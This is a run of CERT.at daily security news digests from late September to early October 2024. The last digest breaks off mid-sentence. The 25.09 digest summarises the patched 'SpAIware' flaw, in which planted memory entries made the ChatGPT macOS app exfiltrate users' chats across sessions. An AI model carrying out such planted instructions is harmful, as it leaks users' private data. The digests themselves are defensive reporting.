===================== = End-of-Day report = ===================== Timeframe: Dienstag 01-10-2024 18:00 − Mittwoch 02-10-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Crook made millions by breaking into execs’ Office365 inboxes, feds say ∗∗∗ --------------------------------------------- Email accounts inside 5 US companies unlawfully breached through password resets. --------------------------------------------- https://arstechnica.com/?p=2053721 ∗∗∗ Evil Corp hit with new sanctions, BitPaymer ransomware charges ∗∗∗ --------------------------------------------- The Evil Corp cybercrime syndicate has been hit with new sanctions by the United States, United Kingdom, and Australia. The US also indicted one of its members for conducting BitPaymer ransomware attacks. --------------------------------------------- https://www.bleepingcomputer.com/news/security/evil-corp-hit-with-new-sanct… ∗∗∗ Arc browser launches bug bounty program after fixing RCE bug ∗∗∗ --------------------------------------------- The Browser Company has introduced an Arc Bug Bounty Program to encourage security researchers to report vulnerabilities to the project and receive rewards. --------------------------------------------- https://www.bleepingcomputer.com/news/security/arc-browser-launches-bug-bou… ∗∗∗ CISA: Network switch RCE flaw impacts critical infrastructure ∗∗∗ --------------------------------------------- U.S. cybersecurity agency CISA is warning about two critical vulnerabilities that allow authentication bypass and remote code execution in Optigo Networks ONS-S8 Aggregation Switch products used in critical infrastructure. --------------------------------------------- https://www.bleepingcomputer.com/news/security/cisa-network-switch-rce-flaw… ∗∗∗ PyPI Repository Found Hosting Fake Crypto Wallet Recovery Tools That Steal User Data ∗∗∗ --------------------------------------------- A new set of malicious packages has been unearthed in the Python Package Index (PyPI) repository that masqueraded as cryptocurrency wallet recovery and management services, only to siphon sensitive data and facilitate the theft .. --------------------------------------------- https://thehackernews.com/2024/10/pypi-repository-found-hosting-fake.html ∗∗∗ Alert: Over 700,000 DrayTek Routers Exposed to Hacking via 14 New Vulnerabilities ∗∗∗ --------------------------------------------- A little over a dozen new security vulnerabilities have been discovered in residential and enterprise routers manufactured by DrayTek that could be exploited to take over susceptible devices."These vulnerabilities could enable attackers to take control .. --------------------------------------------- https://thehackernews.com/2024/10/alert-over-700000-draytek-routers.html ∗∗∗ NISTs security flaw database still backlogged with 17K+ unprocessed bugs. Not great ∗∗∗ --------------------------------------------- Logjam hurting infosec processes world over one expert tells us as US body blows its own Sept deadline NIST has made some progress clearing its backlog of security vulnerability reports to process - though its not quite on target as hoped. --------------------------------------------- https://www.theregister.com/2024/10/02/cve_pileup_nvd_missed_deadline/ ∗∗∗ After Code Execution, Researchers Show How CUPS Can Be Abused for DDoS Attacks ∗∗∗ --------------------------------------------- Over 58,000 internet-exposed CUPS hosts can be abused for significant DDoS attacks, according to Akamai. --------------------------------------------- https://www.securityweek.com/after-code-execution-researchers-show-how-cups… ∗∗∗ Dotnet Source Generators in 2024 Part 1: Getting Started ∗∗∗ --------------------------------------------- In this blog post, we will cover the basics of a source generator, the major types involved, some common issues you might encounter, how to properly log those issues, and how to fix them. --------------------------------------------- https://posts.specterops.io/dotnet-source-generators-in-2024-part-1-getting… ∗∗∗ Aktive Ausnutzung einer Sicherheitslücke in Zimbra Mail Server (CVE-2024-45519) ∗∗∗ --------------------------------------------- Der Hersteller des Zimbra Mail-Servers, Synacor, hat ein Advisory zu einer Sicherheitslücke in Zimbra Collaboration veröffentlicht. Die veröffentlichte Schwachstelle, CVE-2024-45519, erlaubt es nicht-authentifizierten Benutzern aus der Ferne Code auszuführen. Für die betroffenen Versionen (9.0.0, 10.0.9, 10.1.1 und 8.8.15) stehen jeweils Updates bereit, welche eine .. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/10/zimbra-rce-cve-2024-45519 ∗∗∗ Sicherheit: Datenabflüsse bei Cyberangriffen ∗∗∗ --------------------------------------------- Nach einem Cyberangriff auf eine Klinik in Bad Wildungen im August 2024 sind nun Daten im Darknet aufgetaucht. Auch bei der niederländischen Polizei gab es einen Datenabfluss nach einem Cyberangriff. Hier einige Informationen .. --------------------------------------------- https://www.borncity.com/blog/2024/10/02/sicherheit-datenabfluesse-bei-cybe… ∗∗∗ All that JavaScript for… spear phishing? ∗∗∗ --------------------------------------------- NVISO employs several hunting rules in multiple Threat Intelligence Platforms and other sources, such as VirusTotal. As you can imagine, there is no lack of APT (Advanced Persistent Threat) campaigns, cybercriminals and their associated malware families and campaigns, phishing, and so on. But now and then, something slightly different and perhaps novel .. --------------------------------------------- https://blog.nviso.eu/2024/10/02/all-that-javascript-for-spear-phishing/ ∗∗∗ ASD’s ACSC, CISA, FBI, NSA, and International Partners Release Guidance on Principles of OT Cybersecurity for Critical Infrastructure Organizations ∗∗∗ --------------------------------------------- Today, the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) - in partnership with CISA, U.S. government and international partners - released the guide Principles of Operational Technology Cybersecurity. This guidance provides critical information on how to create and maintain a safe, secure operational .. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/10/01/asds-acsc-cisa-fbi-nsa-a… ∗∗∗ LKA Niedersachsen warnt vor andauernder Masche mit Erpresser-Mails ∗∗∗ --------------------------------------------- Die Betrüger lassen nicht nach, warnt das LKA Niedersachsen. Erpresser-Mails etwa mit angeblichen Videoaufnahmen kursieren weiter. --------------------------------------------- https://heise.de/-9960503 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (grafana), Fedora (cjson and php), Oracle (389-ds-base, freeradius, grafana, kernel, and krb5), Slackware (cryfs, cups, and mozilla), SUSE (OpenIPMI, openssl-3, openvpn, thunderbird, and tomcat), and Ubuntu (cups, cups-filters, knot-resolver, linux-raspi, linux-raspi-5.4, orc, php7.4, php8.1, php8.3, python-asyncssh, ruby-devise-two-factor, and vim). --------------------------------------------- https://lwn.net/Articles/992650/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 01.10.2024
by Daily end-of-shift report 01 Oct '24

01 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Montag 30-09-2024 18:00 − Dienstag 01-10-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Microsoft Defender adds detection of unsecure Wi-Fi networks ∗∗∗ --------------------------------------------- Microsoft Defender now automatically detects and notifies users with a Microsoft 365 Personal or Family subscription when theyre connected to unsecured Wi-Fi networks. --------------------------------------------- https://www.bleepingcomputer.com/news/security/microsoft-defender-now-autom… ∗∗∗ Microsoft overhauls security for publishing Edge extensions ∗∗∗ --------------------------------------------- Microsoft has introduced an updated version of the "Publish API for Edge extension developers" that increases the security for developer accounts and the updating of browser extensions. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-overhauls-securit… ∗∗∗ What Are Hackers Searching for in SolarWinds Serv-U (CVE-2024-28995)? ∗∗∗ --------------------------------------------- Discover how GreyNoise’s honeypots are monitoring exploit attempts on the SolarWinds Serv-U vulnerability (CVE-2024-28995). Gain insights into the specific files attackers target and how real-time data helps security teams focus on true threats. --------------------------------------------- https://www.greynoise.io/blog/what-are-hackers-searching-for-in-solarwinds-… ∗∗∗ Detecting Vulnerability Scanning Traffic From Underground Tools Using Machine Learning ∗∗∗ --------------------------------------------- Researchers detail the discovery of Swiss Army Suite, an underground tool used for SQL injection scans discovered with a machine learning model. --------------------------------------------- https://unit42.paloaltonetworks.com/machine-learning-new-swiss-army-suite-t… ∗∗∗ Rackspace internal monitoring web servers hit by zero-day ∗∗∗ --------------------------------------------- Reading between the lines, it appears Rackspace was hosting a ScienceLogic-powered monitoring dashboard for its customers on its own internal web servers, those servers included a program that was bundled with ScienceLogic's software, and that program was exploited, using a zero-day vulnerability, by miscreants to gain access to those web servers. From there, the intruders were able to get hold of some monitoring-related customer information before being caught. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/09/30/rackspace_ze… ∗∗∗ Crooked Cops, Stolen Laptops & the Ghost of UGNazi ∗∗∗ --------------------------------------------- A California man accused of failing to pay taxes on tens of millions of dollars allegedly earned from cybercrime also paid local police officers hundreds of thousands of dollars to help him extort, intimidate and silence rivals and former business partners, a new indictment charges. KrebsOnSecurity has learned that many of the mans alleged targets were members of UGNazi, a hacker group behind multiple high-profile breaches and cyberattacks back in 2012. --------------------------------------------- https://krebsonsecurity.com/2024/09/crooked-cops-stolen-laptops-the-ghost-o… ∗∗∗ BSI empfiehlt die Nutzung von Passkeys ∗∗∗ --------------------------------------------- Das BSI empfiehlt die Nutzung von Passkeys. Eine Umfrage zeige auf, dass die Bekanntheit und Verbreitung ausbaufähig seien. --------------------------------------------- https://heise.de/-9959270 ∗∗∗ Ransomware: Ermittler melden neue Erfolge im Kampf gegen Lockbit ∗∗∗ --------------------------------------------- Neben Verhaftungen in Frankreich und Großbritannien haben internationale Strafverfolger die Infrastruktur der Erpresser gestört – zudem ergingen Sanktionen. --------------------------------------------- https://heise.de/-9959100 ∗∗∗ WordPress Vulnerability & Patch Roundup September 2024 ∗∗∗ --------------------------------------------- Vulnerability reports and responsible disclosures are essential for website security awareness and education. --------------------------------------------- https://blog.sucuri.net/2024/09/wordpress-vulnerability-patch-roundup-septe… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (debian-security-support, nghttp2, and sqlite3), Oracle (cups-filters, kernel, and osbuild-composer), SUSE (openssl-3), and Ubuntu (bubblewrap, flatpak and python2.7, python3.5). --------------------------------------------- https://lwn.net/Articles/992444/ ∗∗∗ Mozilla Foundation Security Advisories 2024-10-01 (Thunderbird and Firefox) ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/ ∗∗∗ Juniper: 2024-09-30 Out of Cycle Security Advisory: Multiple Products: RADIUS protocol susceptible to forgery attacks (Blast-RADIUS) (CVE-2024-3596) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2024-09-30-Out-of-Cycle-Securit… ∗∗∗ Bosch: Sensitive information disclosure in Bosch Configuration Manager ∗∗∗ --------------------------------------------- https://psirt.bosch.com/security-advisories/bosch-sa-981803-bt.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 30.09.2024
by Daily end-of-shift report 30 Sep '24

30 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 27-09-2024 18:00 − Montag 30-09-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ US-Wahlkampf: Anklage wegen des Hacks der Trump-Kampagne erhoben ∗∗∗ --------------------------------------------- Drei Männer müssen sich vor Gericht wegen des Cyberangriffs auf das Wahlkampfteam von Donald Trump verantworten. --------------------------------------------- https://www.golem.de/news/us-wahlkampf-anklage-wegen-des-hacks-der-trump-ka… ∗∗∗ How to Know if Your Website Is Hacked ∗∗∗ --------------------------------------------- Whether you manage a gaming blog, an e-commerce platform, or an enterprise-level website you probably want to be able to detect infections when they occur. A hacked website can lead to financial loss, disruption of business operations, and the exposure of confidential information. The key is acting fast once you discover possible .. --------------------------------------------- https://blog.sucuri.net/2024/09/how-do-website-owners-know-that-their-websi… ∗∗∗ If youre holding important data, Iran is probably trying spearphish it ∗∗∗ --------------------------------------------- Its election year for more than 50 countries and the Islamic Republic threatens a bunch of them US and UK national security agencies are jointly warning about Iranian spearphishing campaigns, which remain an ongoing threat to various industries and governments. --------------------------------------------- https://www.theregister.com/2024/09/30/iran_spearphishing/ ∗∗∗ The Pig Butchering Invasion Has Begun ∗∗∗ --------------------------------------------- Scamming operations that once originated in Southeast Asia are now proliferating around the world, likely raking in billions of dollars in the process. --------------------------------------------- https://www.wired.com/story/pig-butchering-scam-invasion/ ∗∗∗ Eliminating Memory Safety Vulnerabilities at the Source ∗∗∗ --------------------------------------------- Memory safety vulnerabilities remain a pervasive threat to software security. At Google, we believe the path to eliminating this class of vulnerabilities at scale and building high-assurance software lies in Safe Coding, a secure-by-design approach that prioritizes transitioning .. --------------------------------------------- http://security.googleblog.com/2024/09/eliminating-memory-safety-vulnerabil… ∗∗∗ The Data Breach Disclosure Conundrum ∗∗∗ --------------------------------------------- The conundrum I refer to in the title of this post is the one faced by a breached organisation: disclose or suppress? And let me be even more specific: should they disclose to impacted individuals, or simply never let them know? --------------------------------------------- https://www.troyhunt.com/the-data-breach-disclosure-conundrum/ ∗∗∗ How can you protect your data, privacy, and finances if your phone gets lost or stolen? ∗∗∗ --------------------------------------------- Steps to take when your device is lost or stolen TL;DR This is a guide to help prepare for a situation where your mobile device is lost or stolen, including .. --------------------------------------------- https://www.pentestpartners.com/security-blog/how-can-you-protect-your-data… ∗∗∗ Cyber Security Month: Stärken Sie Ihr Wissen ∗∗∗ --------------------------------------------- Im Oktober dreht sich alles um das Thema Cybersicherheit. Nutzen Sie die Gelegenheit, um Ihr Wissen über Phishing, Schadsoftware und andere Cyberbedrohungen aufzufrischen. --------------------------------------------- https://www.watchlist-internet.at/news/cyber-security-month-2024/ ∗∗∗ Nitrogen Campaign Drops Sliver and Ends With BlackCat Ransomware ∗∗∗ --------------------------------------------- In November 2023, we identified a BlackCat ransomware intrusion started by Nitrogen malware hosted on a website impersonating Advanced IP .. --------------------------------------------- https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-end… ∗∗∗ Datenschutzvorfall bei GlobalSign (Sept. 2024) ∗∗∗ --------------------------------------------- Der Anbieter GlobalSign musste gegenüber einigen Kunden einen Datenschutzvorfall eingestehen. Bei deren Customer Relationship Management Platform (CRM) kam es zu einer Fehlkonfigurierung, so dass ein .. --------------------------------------------- https://www.borncity.com/blog/2024/09/30/datenschutzvorfall-bei-globalsign-… ∗∗∗ Facial DNA provider leaks biometric data via WordPress folder ∗∗∗ --------------------------------------------- ChiceDNA exposed 8,000 sensitive records, including biometric images, personal details, and facial DNA data in an unsecured WordPress… --------------------------------------------- https://hackread.com/facial-dna-provider-leak-biometric-data-wordpress-fold… ===================== = Vulnerabilities = ===================== ∗∗∗ Local Privilege Escalation mittels MSI Installer in Nitro PDF Pro ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/local-privilege-escal… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 27.09.2024
by Daily end-of-shift report 27 Sep '24

27 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 26-09-2024 18:00 − Freitag 27-09-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Storm-0501: Ransomware attacks expanding to hybrid cloud environments ∗∗∗ --------------------------------------------- Microsoft has observed the threat actor tracked as Storm-0501 launching a multi-staged attack where they compromised hybrid cloud environments and performed lateral movement from on-premises to cloud environment, leading to data exfiltration, credential theft, tampering, persistent backdoor access, and ransomware deployment. The .. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomw… ∗∗∗ NIST Recommends Some Common-Sense Password Rules ∗∗∗ --------------------------------------------- NIST’s second draft of its “SP 800-63-4“ - its digital identify guidelines - finally contains some really good rules about passwords. --------------------------------------------- https://www.schneier.com/blog/archives/2024/09/nist-recommends-some-common-… ∗∗∗ Kaspersky Defends Stealth Swap of Antivirus Software on US Computers ∗∗∗ --------------------------------------------- Cybersecurity firm Kaspersky has defended its decision to automatically replace its antivirus software on U.S. customers computers with UltraAV, a product from American company Pango, without explicit user consent. The forced switch, affecting nearly one million users, occurred as a result of a U.S. government ban on Kaspersky software. Kaspersky .. --------------------------------------------- https://it.slashdot.org/story/24/09/26/1825249/kaspersky-defends-stealth-sw… ∗∗∗ Hackers Could Have Remotely Controlled Kia Cars Using Only License Plates ∗∗∗ --------------------------------------------- Cybersecurity researchers have disclosed a set of now patched vulnerabilities in Kia vehicles that, if successfully exploited, could have allowed remote control over key functions simply by using only a license plate."These attacks could be .. --------------------------------------------- https://thehackernews.com/2024/09/hackers-could-have-remotely-controlled.ht… ∗∗∗ Victims lose $70K to one single wallet-draining app on Googles Play Store ∗∗∗ --------------------------------------------- Attackers got 10k people to download trusted web3 brand cheat before Mountain View intervened The latest in a long line of cryptocurrency wallet-draining attacks has stolen $70,000 from people who downloaded a dodgy app in a single campaign .. --------------------------------------------- https://www.theregister.com/2024/09/26/victims_lose_70k_to_play/ ∗∗∗ Patch now: Critical Nvidia bug allows container escape, complete host takeover ∗∗∗ --------------------------------------------- 33% of cloud environments using the toolkit impacted, were told A critical bug in Nvidias widely used Container Toolkit could allow a rogue user or software to escape their containers and ultimately take complete control of the underlying host. --------------------------------------------- https://www.theregister.com/2024/09/26/critical_nvidia_bug_container_escape/ ∗∗∗ Highly Anticipated Linux Flaw Allows Remote Code Execution, but Less Serious Than Expected ∗∗∗ --------------------------------------------- A researcher has disclosed the details of an unpatched vulnerability that was expected to pose a serious threat to many Linux systems. --------------------------------------------- https://www.securityweek.com/highly-anticipated-linux-flaw-allows-remote-co… ∗∗∗ US Announces Charges, Sanctions Against Russian Administrator of Carding Website ∗∗∗ --------------------------------------------- US offers up to $10 million for information on Timur Shakhmametov, charging him with running the carding website Joker’s Stash. --------------------------------------------- https://www.securityweek.com/us-announces-charges-sanctions-against-russian… ∗∗∗ Spatenstich für Cybersecurity-Campus der TU Graz ∗∗∗ --------------------------------------------- Rund 25 Millionen Euro werden in den Komplex für bis zu 160 Forschende in der Sandgasse investiert. Auch IT-Start-ups sollen dort Platz finden --------------------------------------------- https://www.derstandard.at/story/3000000238456/spatenstich-fuer-cybersecuri… ∗∗∗ Cyberespionage the Gamaredon way: Analysis of toolset used to spy on Ukraine in 2022 and 2023 ∗∗∗ --------------------------------------------- ESET Research has conducted a comprehensive technical analysis of Gamaredon’s toolset used to conduct its cyberespionage activities focused in Ukraine --------------------------------------------- https://www.welivesecurity.com/en/eset-research/cyberespionage-gamaredon-wa… ∗∗∗ Geoblocking als einfache DDoS-Abwehr ∗∗∗ --------------------------------------------- Distributed Denial of Service (DDoS) Angriffe gibt es in diversen Varianten, das reicht von reflected UDP mit hoher Bandbreite über Tricksereien auf Layer 4 (etwa TCP-SYN Flooding, oder auch nur Überlastung der State-Tabellen in Firewalls) bis hin zu Layer 7 Angriffen mit vielen teuren http Anfragen. Aktuell sehen wir gerade letztere, dazu wollen wir ein .. --------------------------------------------- https://www.cert.at/de/blog/2024/9/geoblocking-gegen-ddos ∗∗∗ Meta fined $101 million for storing hundreds of millions of passwords in plaintext ∗∗∗ --------------------------------------------- European regulators fined Meta for an engineering mistake that the social media giant first reported in 2019. --------------------------------------------- https://therecord.media/meta-unprotected-passwords-fine-gdpr ===================== = Vulnerabilities = ===================== ∗∗∗ ZDI-24-1290: TeamViewer Missing Authentication Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1290/ ∗∗∗ ZDI-24-1289: TeamViewer Missing Authentication Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1289/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 26.09.2024
by Daily end-of-shift report 26 Sep '24

26 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 25-09-2024 18:00 − Donnerstag 26-09-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Talos discovers denial-of-service vulnerability in Microsoft Audio Bus; Potential remote code execution in popular open-source PLC ∗∗∗ --------------------------------------------- Cisco Talos’ Vulnerability Research team recently disclosed two vulnerabilities in Microsoft products that have been patched by the company over the past two Patch Tuesdays. One is a vulnerability in the High-Definition Audio Bus Driver in Windows systems that could lead to a denial of service, while the other is a memory corruption issue that exists in a multicasting protocol in Windows 10. [..] For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website. --------------------------------------------- https://blog.talosintelligence.com/talos-discovers-denial-of-service-vulner… ∗∗∗ The Cyber Resilience Act, an Accidental European Alien Torts Statute? ∗∗∗ --------------------------------------------- What if someone is harmed by their own government, but the technology used against them was created by a company based in the United States? Should that person be able to hold the American company responsible? --------------------------------------------- https://www.lawfaremedia.org/article/the-cyber-resilience-act--an-accidenta… ∗∗∗ Threat landscape for industrial automation systems, Q2 2024 ∗∗∗ --------------------------------------------- In this report, we share statistics on threats to industrial control systems in Q2 2024, including statistics by region, industry, malware and other threat types. --------------------------------------------- https://securelist.com/industrial-threat-landscape-q2-2024/113981/ ∗∗∗ Direct Memory Access (DMA) attacks. Risks, techniques, and mitigations in hardware hacking ∗∗∗ --------------------------------------------- DMA allows input-output (I/O) devices to access memory without CPU involvement. Bypassing the Operating System (OS) by providing direct high-speed access to the system’s memory improves efficiency for Graphics processing units (GPUs), Network Interface Cards (NICs), storage devices (e.g. NVMe) and peripheral devices. DMA capable connections include PCI, PCI Express (PCIe), Thunderbolt, FireWire, ExpressCard. Without additional safeguards, DMA can make systems vulnerable to attacks. --------------------------------------------- https://www.pentestpartners.com/security-blog/direct-memory-access-dma-atta… ∗∗∗ Unraveling Sparkling Pisces’s Tool Set: KLogEXE and FPSpy ∗∗∗ --------------------------------------------- We analyze new tools DPRK-linked APT Sparkling Pisces (aka Kimsuky) used in cyberespionage campaigns: KLogExe (a keylogger) and FPSpy (a backdoor variant). --------------------------------------------- https://unit42.paloaltonetworks.com/kimsuky-new-keylogger-backdoor-variant/ ∗∗∗ Simple Mail Transfer Pirates: How threat actors are abusing third-party infrastructure to send spam ∗∗∗ --------------------------------------------- Spammers are always looking for creative ways to bypass spam filters. As a spammer, one of the problems with creating your own architecture to deliver mail is that, once the spam starts flowing, these sources (IPs/domains) can be blocked. Spam can more easily find its way into the inbox if it is delivered from an unexpected or legitimate source. Realizing this, many spammers have elected to attack web pages and mail servers of legitimate organizations, so they may use these “pirated” resources to send unsolicited email. --------------------------------------------- https://blog.talosintelligence.com/simple-mail-transfer-pirates/ ∗∗∗ Phishing and Social Engineering: The Human Factor in Election Security ∗∗∗ --------------------------------------------- Discover how phishing and social engineering threaten the 2024 U.S. elections in part three of our Election Cybersecurity series. Learn how attackers exploit human vulnerabilities to compromise systems and how to defend against these evolving threats. --------------------------------------------- https://www.greynoise.io/blog/phishing-and-social-engineering-the-human-fac… ∗∗∗ Dell Hit by Third Data Leak in a Week Amid “grep” Cyberattacks ∗∗∗ --------------------------------------------- Dell faces its third data leak in a week as hacker “grep” continues targeting the tech giant. Sensitive internal files, including project documents and MFA data, were exposed. Dell has yet to issue a formal response. --------------------------------------------- https://hackread.com/dell-data-leak-in-week-amid-grep-cyberattacks/ ===================== = Vulnerabilities = ===================== ∗∗∗ HPE Aruba Networking fixes critical flaws impacting Access Points ∗∗∗ --------------------------------------------- HPE Aruba Networking has fixed three critical vulnerabilities in the Command Line Interface (CLI) service of its Aruba Access Points, which could let unauthenticated attackers gain remote code execution on vulnerable devices. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hpe-aruba-networking-fixes-t… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (container-tools:rhel8, dovecot, emacs, expat, git-lfs, go-toolset:rhel8, golang, grafana, grafana-pcp, gtk3, kernel, kernel-rt, nano, python3, python3.11, python3.12, and virt:rhel and virt-devel:rhel), Debian (mediawiki and puredata), Fedora (chisel), Mageia (glib2.0, gtk+2.0 and gtk+3.0, and python-astropy), Red Hat (git-lfs, grafana, grafana-pcp, kernel, and kernel-rt), SUSE (kubernetes1.24, kubernetes1.25, kubernetes1.26, kubernetes1.27, kubernetes1.28, opensc, and python36), and Ubuntu (apparmor, apr, ca-certificates, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-raspi, openjpeg2, ruby-rack, and tomcat8, tomcat9). --------------------------------------------- https://lwn.net/Articles/991897/ ∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2024-0005 ∗∗∗ --------------------------------------------- Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. CVE identifiers: CVE-2024-23271, CVE-2024-27808, CVE-2024-27820, CVE-2024-27833, CVE-2024-27838, CVE-2024-27851, CVE-2024-40866, CVE-2024-44187 --------------------------------------------- https://webkitgtk.org/security/WSA-2024-0005.html ∗∗∗ Cisco IOS XE Software for Wireless Controllers CWA Pre-Authentication ACL Bypass Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco IOS XE Software Web UI Cross-Site Request Forgery Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco IOS and IOS XE Software Web UI Cross-Site Request Forgery Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (September 16, 2024 to September 22, 2024) ∗∗∗ --------------------------------------------- https://www.wordfence.com/blog/2024/09/wordfence-intelligence-weekly-wordpr… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 25.09.2024
by Daily end-of-shift report 25 Sep '24

25 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 24-09-2024 18:00 − Mittwoch 25-09-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ ChatGPT macOS Flaw Couldve Enabled Long-Term Spyware via Memory Function ∗∗∗ --------------------------------------------- A now-patched security vulnerability in OpenAI's ChatGPT app for macOS could have made it possible for attackers to plant long-term persistent spyware into the artificial intelligence (AI) tool's memory. The technique, dubbed SpAIware, could be abused to facilitate "continuous data exfiltration of any information the user typed or responses received by ChatGPT, including any future chat sessions," security researcher Johann Rehberger said. --------------------------------------------- https://thehackernews.com/2024/09/chatgpt-macos-flaw-couldve-enabled-long.h… ∗∗∗ Schon wieder: Offizielles Twitter-Konto OpenAIs von Krypto-Betrügern übernommen ∗∗∗ --------------------------------------------- Der offizielle Twitter-Account der Pressestelle von ChatGPT-Anbieter OpenAI wurde von Betrügern übernommen und genutzt, um eine Fake-Kryptowährung zu promoten. --------------------------------------------- https://heise.de/-9953073 ∗∗∗ AI-Generated Malware Found in the Wild ∗∗∗ --------------------------------------------- HP has intercepted an email campaign comprising a standard malware payload delivered by an AI-generated dropper. --------------------------------------------- https://www.securityweek.com/ai-generated-malware-found-in-the-wild/ ∗∗∗ Investigating Infrastructure and Tactics of Phishing-as-a-Service Platform Sniper Dz ∗∗∗ --------------------------------------------- Delve into the infrastructure and tactics of phishing platform Sniper Dz, which targets popular brands and social media. We discuss its unique aspects and more. --------------------------------------------- https://unit42.paloaltonetworks.com/phishing-platform-sniper-dz-unique-tact… ∗∗∗ LummaC2: Obfuscation Through Indirect Control Flow ∗∗∗ --------------------------------------------- This blog post delves into the analysis of a control flow obfuscation technique employed by recent LummaC2 (LUMMAC.V2) stealer samples. In addition to the traditional control flow flattening technique used in older versions, the malware now leverages customized control flow indirection to manipulate the execution of the malware. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/lummac2-obfuscatio… ∗∗∗ Modified LockBit and Conti ransomware shows up in DragonForce gang’s attacks ∗∗∗ --------------------------------------------- The manufacturing, real estate and transportation industries are recent targets of the cybercrime operation known as DragonForce. Researchers say its serving up versions of LockBit and Conti to affiliates. --------------------------------------------- https://therecord.media/lockbit-conti-dragonforce-ransomware-cybercrime ∗∗∗ Shedding Light on Election Deepfakes ∗∗∗ --------------------------------------------- Contrary to popular belief, deepfakes — AI-crafted audio files, images, or videos that depict events and statements that never occurred; a portmanteau of “deep learning” and “fake” — are not all intrinsically malicious. [..] Let’s take a look at the state of deepfakes during the 2020 elections, how it’s currently making waves in the 2024 election cycle, and how voters can tell truth from digital deception. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/shedding-li… ===================== = Vulnerabilities = ===================== ∗∗∗ 20,000 WordPress Sites Affected by Privilege Escalation Vulnerability in WCFM – WooCommerce Frontend Manager WordPress Plugin ∗∗∗ --------------------------------------------- This vulnerability makes it possible for an authenticated attacker to change the email of any user, including an administrator, which allows them to reset the password and take over the account and website. [..] After providing full disclosure details, the developer released a patch on September 23, 2024. [..] CVE ID: CVE-2024-8290 --------------------------------------------- https://www.wordfence.com/blog/2024/09/20000-wordpress-sites-affected-by-pr… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (booth), Gentoo (Xpdf), Oracle (go-toolset:ol8, golang, grafana, grafana-pcp, kernel, libnbd, openssl, pcp, and ruby:3.3), Red Hat (container-tools:rhel8, go-toolset:rhel8, golang, kernel, and kernel-rt), SUSE (apr, cargo-audit, chromium, obs-service-cargo, python311, python36, quagga, traefik, and xen), and Ubuntu (intel-microcode, linux-azure-fde-5.15, and puma). --------------------------------------------- https://lwn.net/Articles/991701/ ∗∗∗ WatchGuard SSO and Moodle ∗∗∗ --------------------------------------------- rt-sa-2024-008: WatchGuard SSO Client Denial-of-Service, rt-sa-2024-007: WatchGuard SSO Agent Telnet Authentication Bypass, rt-sa-2024-006: WatchGuard SSO Protocol is Unencrypted and Unauthenticated, rt-sa-2024-009: Moodle: Remote Code Execution via Calculated Questions --------------------------------------------- https://www.redteam-pentesting.de/en/advisories/ ∗∗∗ Teamviewer: Hochriskante Lücken ermöglichen Rechteausweitung ∗∗∗ --------------------------------------------- In den Teamviewer-Remote-Clients können Angreifer eine unzureichende kryptografische Prüfung von Treiberinstallationen 